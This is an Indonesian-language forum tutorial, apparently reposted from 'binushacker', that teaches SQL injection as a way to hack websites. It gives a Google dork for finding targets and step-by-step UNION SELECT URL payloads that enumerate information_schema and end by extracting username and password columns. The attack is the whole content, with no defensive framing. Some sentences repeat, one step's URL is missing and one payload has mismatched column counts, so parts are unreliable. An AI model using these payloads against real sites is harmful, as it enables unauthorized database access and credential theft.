SQL INJECTION TUTORIAL@yg perlu diketahui bagi para pemula , download dulu my sql server 5
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.
pertama tama kita harus mencari dork nya terlebih dahulu ,
seperti contohnya : inurl:*news*php?id=
dan masih banyk lagi , silahkan anda cari di google :)
nah yuk kita mulai
kita cari bug (celah) web nya dengan cara menambah kan petik ' ,atau -
seperti contohnya :
www.contoh.com/news.php?id=90
untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
code : www.contoh.com/news.php?id=90'
kalo udah nemu eror nya , langsung aja kita lanjut ke step selanjutnya
Mencari Kolom :
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu kalian ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
http://www.example.com/index.php?id=90+ORDER+BY+(nomer)--
periksa secara step by step sampai ketemu jumlah kolom nya
Yuk kita lanjutkan ke kolom yg kamu temukan ,
misal pada order by 9 anda sudah menemukan eror nya , ni membuktikan bahwa table database hanya memiliki 8 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 8, akan selalu error.
Menemukan kolom yang dapat di akses
Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
www.contoh.com/index.php?id=-90+UNION+SELECT+1,2,3,4,5,6,7--
Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “90“,
Mencari MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
ganti angka yg anda temukan dengan @@version
misal angka 1 yg muncul :
www.contoh.com/index.php?id=-90+UNION+SELECT+@@version+,2,3,4,5,6,7--
Mencari Database Names
Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version”
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
www.contoh.com/index.php?id=-90+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata”
Jadi URL nya akan menjadi seperti ini:
www.contoh.com/index.php?id=-90+UNION+SELECT+concat(database()),2,3,4,5,6,7--
anda telah mendapatkan informasi database yang saat ini digunakan. :))
Menemukan Nama Table
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Menemukan Nama Kolom
Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Url akan tampak seperti ini:
www.contoh.com/index.php?id=-90 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
username
password
password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
http://www.example.com/index.php?id=-90 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinya. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
good luck
form :
binushacker
binushacker
